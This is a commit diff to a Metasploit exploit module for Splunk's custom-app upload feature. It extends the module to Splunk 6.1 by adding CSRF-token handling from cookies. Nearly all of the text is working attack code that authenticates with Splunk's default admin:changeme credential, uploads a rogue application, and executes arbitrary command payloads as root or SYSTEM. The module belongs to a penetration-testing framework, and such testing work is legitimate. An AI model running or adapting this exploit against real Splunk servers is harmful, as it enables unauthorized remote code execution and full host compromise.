Land rapid7#3507/rapid7#3463, a communal effort around improving splunk_upload_app_exec

Author: jhart-r7

modules/exploits/multi/http/splunk_upload_app_exec.rb

@@ -11,23 +11,24 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Splunk 5.0 Custom App Remote Code Execution',
-      'Description'    => %q{
-          This module exploits a feature of Splunk whereby a custom application can be
-        uploaded through the web based interface. Through the 'script' search command a
+    super(update_info(
+      info,
+      'Name'           => 'Splunk Custom App Remote Code Execution',
+      'Description'    =>
+        'This module exploits a feature of Splunk whereby a custom application can be
+        uploaded through the web based interface. Through the \'script\' search command a
         user can call commands defined in their custom application which includes arbitrary
         perl or python code. To abuse this behavior, a valid Splunk user with the admin
         role is required. By default, this module uses the credential of "admin:changeme",
         the default Administrator credential for Splunk. Note that the Splunk web interface
-        runs as SYSTEM on Windows, or as root on Linux by default. This module has only
-        been tested successfully against Splunk 5.0.
-      },
+        runs as SYSTEM on Windows, or as root on Linux by default. This module has been
+        tested successfully against Splunk 5.0, 6.1, and 6.1.1.',
       'Author'         =>
         [
           "marcwickenden", # discovery and metasploit module
           "sinn3r", # metasploit module
-          "juan vazquez" # metasploit module
+          "juan vazquez", # metasploit module
+          "Gary Blosser" # metasploit module updates for Splunk 6.1
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -41,16 +42,16 @@ def initialize(info = {})
           'Space'       => 1024,
           'DisableNops' => true
         },
-      'Platform'       => %w{ linux unix win },
+      'Platform'       => %w(linux unix win),
       'Targets'        =>
         [
-          [ 'Splunk 5.0.1 / Linux',
+          [ 'Splunk >= 5.0.1 / Linux',
             {
               'Arch'     => ARCH_CMD,
-              'Platform' => %w{ linux unix }
+              'Platform' => %w(linux unix)
             }
           ],
-          [ 'Splunk 5.0.1 / Windows',
+          [ 'Splunk >= 5.0.1 / Windows',
             {
               'Arch'     => ARCH_CMD,
               'Platform' => 'win'
@@ -62,9 +63,10 @@ def initialize(info = {})
     register_options(
       [
         Opt::RPORT(8000),
-        OptString.new('USERNAME', [ true, 'The username with admin role to authenticate as','admin' ]),
-        OptString.new('PASSWORD', [ true, 'The password for the specified username','changeme' ]),
-        OptPath.new('SPLUNK_APP_FILE',
+        OptString.new('USERNAME', [ true, 'The username with admin role to authenticate as', 'admin' ]),
+        OptString.new('PASSWORD', [ true, 'The password for the specified username', 'changeme' ]),
+        OptPath.new(
+          'SPLUNK_APP_FILE',
           [
             true,
             'The "rogue" Splunk application tgz',
@@ -96,6 +98,7 @@ def exploit
     # set up some variables for later use
     @auth_cookies = ''
     @csrf_form_key = ''
+    @csrf_form_port = "splunkweb_csrf_token_#{rport}" # Default to using rport, corrected during tokenization for v6 below.
     app_name = 'upload_app_exec'
     p = payload.encoded
     print_status("Using command: #{p}")
@@ -118,14 +121,13 @@ def exploit
     # call our command execution function with the Splunk 'script' command
     print_status("Invoking script command")
     res = send_request_cgi(
-    {
       'uri'     => '/en-US/api/search/jobs',
       'method'  => 'POST',
-      'cookie'  => @auth_cookies,
+      'cookie'  => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified)
       'headers' =>
         {
           'X-Requested-With' => 'XMLHttpRequest',
-          'X-Splunk-Form-Key' => @csrf_form_key
+          'X-Splunk-Form-Key' => @csrf_form_key   # Version 6 ignores extra headers (verified)
         },
       'vars_post' =>
         {
@@ -142,24 +144,24 @@ def exploit
           'latest_time' => "",
           'timeFormat' => "%s.%Q"
         }
-    })
+    )
 
     if return_output
       res.body.match(/data":\ "([0-9.]+)"/)
-      job_id = $1
+      job_id = Regexp.last_match(1)
 
       # wait a short time to let the output be produced
       print_status("Waiting for #{command_output_delay} seconds to retrieve command output")
-      select(nil,nil,nil,command_output_delay)
+      select(nil, nil, nil, command_output_delay)
       job_output = fetch_job_output(job_id)
       if job_output.body.match(/Waiting for data.../)
         print_status("No output returned in time")
-      elsese
+      else
         output = ""
         job_output.body.each_line do |line|
           # strip off the leading and trailing " added by Splunk
-          line.gsub!(/^"/,"")
-          line.gsub!(/"$/,"")
+          line.gsub!(/^"/, "")
+          line.gsub!(/"$/, "")
           output << line
         end
 
@@ -181,7 +183,7 @@ def check
       'method'  => 'GET'
     }, 25)
 
-    if res and res.body =~ /Splunk Inc\. Splunk/
+    if res && res.body =~ /Splunk Inc\. Splunk/
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Safe
@@ -192,18 +194,17 @@ def do_login
     print_status("Authenticating...")
     # this method borrowed with thanks from splunk_mappy_exec.rb
     res = send_request_cgi(
-    {
       'uri'     => '/en-US/account/login',
       'method'  => 'GET'
-    })
+    )
 
     cval = ''
     uid = ''
     session_id_port =
     session_id = ''
-    if res and res.code == 200
-      res.get_cookies.split(';').each {|c|
-        c.split(',').each {|v|
+    if res && res.code == 200
+      res.get_cookies.split(';').each do |c|
+        c.split(',').each do |v|
           if v.split('=')[0] =~ /cval/
             cval = v.split('=')[1]
           elsif v.split('=')[0] =~ /uid/
@@ -212,14 +213,13 @@ def do_login
             session_id_port = v.split('=')[0]
             session_id = v.split('=')[1]
           end
-        }
-      }
+        end
+      end
     else
       fail_with(Failure::NotFound, "Unable to get session cookies")
     end
 
     res = send_request_cgi(
-    {
       'uri'     => '/en-US/account/login',
       'method'  => 'POST',
       'cookie'  => "uid=#{uid}; #{session_id_port}=#{session_id}; cval=#{cval}",
@@ -229,21 +229,21 @@ def do_login
           'username' => @username,
           'password' => @password
         }
-    })
+    )
 
-    if not res or res.code != 303
-      fail_with(Failure::NoAccess, "Unable to authenticate")
+    if !res
+      fail_with(Failure::Unreachable, "No response")
     else
       session_id_port = ''
       session_id = ''
-      res.get_cookies.split(';').each {|c|
-        c.split(',').each {|v|
+      res.get_cookies.split(';').each do |c|
+        c.split(',').each do |v|
           if v.split('=')[0] =~ /session_id/
             session_id_port = v.split('=')[0]
             session_id = v.split('=')[1]
           end
-        }
-      }
+        end
+      end
       @auth_cookies = "#{session_id_port}=#{session_id}"
     end
   end
@@ -271,15 +271,17 @@ def do_upload_app(app_name, file_name)
     data << file_data
     data << "\r\n--#{boundary}--\r\n"
 
-    res = send_request_cgi({
-      'uri'     => '/en-US/manager/appinstall/_upload',
-      'method'  => 'POST',
-      'cookie'  => @auth_cookies,
-      'ctype'   => "multipart/form-data; boundary=#{boundary}",
-      'data'    => data
-    }, 30)
-
-    if (res and (res.code == 303 or (res.code == 200 and res.body !~ /There was an error processing the upload/)))
+    res = send_request_cgi(
+      {
+        'uri' => '/en-US/manager/appinstall/_upload',
+        'method' => 'POST',
+        # Does not seem to require the cookie, but it does not break it. I bet 6.2 will have a cookie here too.
+        'cookie' => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}",
+        'ctype' => "multipart/form-data; boundary=#{boundary}",
+        'data' => data
+      }, 30)
+
+    if res && (res.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/))
       print_status("#{app_name} successfully uploaded")
     else
       fail_with(Failure::Unknown, "Error uploading")
@@ -289,26 +291,35 @@ def do_upload_app(app_name, file_name)
   def do_get_csrf(uri)
     print_status("Fetching csrf token from #{uri}")
     res = send_request_cgi(
-    {
       'uri'    => uri,
       'method' => 'GET',
       'cookie' => @auth_cookies
-    })
-    res.body.match(/FORM_KEY":\ "(\d+)"/)
-    @csrf_form_key = $1
-    fail_with(Failure::Unknown, "csrf form Key not found") if not @csrf_form_key
+    )
+    res.body.match(/FORM_KEY":\ "(\d+)"/) # Version 5
+    @csrf_form_key = Regexp.last_match(1)
+
+    unless @csrf_form_key # Version 6
+      res.get_cookies.split(';').each do |c|
+        c.split(',').each do |v|
+          if v.split('=')[0] =~ /splunkweb_csrf_token/  # regex as the full name is something like splunkweb_csrf_token_8000
+            @csrf_form_port = v.split('=')[0] # Accounting for tunnels where rport is not the actual server-side port
+            @csrf_form_key = v.split('=')[1]
+          end
+        end
+      end
+    end
+
+    fail_with(Failure::Unknown, "csrf form Key not found") unless @csrf_form_key
   end
 
   def fetch_job_output(job_id)
     # fetch the output of our job id as csv for easy parsing
     print_status("Fetching job_output for id #{job_id}")
-    res = send_request_raw(
-    {
-      'uri'    => "/en-US/api/search/jobs/#{job_id}/result?isDownload=true&timeFormat=%25FT%25T.%25Q%25%3Az&maxLines=0&count=0&filename=&outputMode=csv&spl_ctrl-limit=unlimited&spl_ctrl-count=10000",
+    send_request_raw(
+      'uri' => "/en-US/api/search/jobs/#{job_id}/result?isDownload=true&timeFormat=%25FT%25T.%25Q%25%3Az&maxLines=0&count=0&filename=&outputMode=csv&spl_ctrl-limit=unlimited&spl_ctrl-count=10000",
       'method' => 'GET',
       'cookie' => @auth_cookies,
       'encode_param' => 'false'
-    })
+    )
   end
-
 end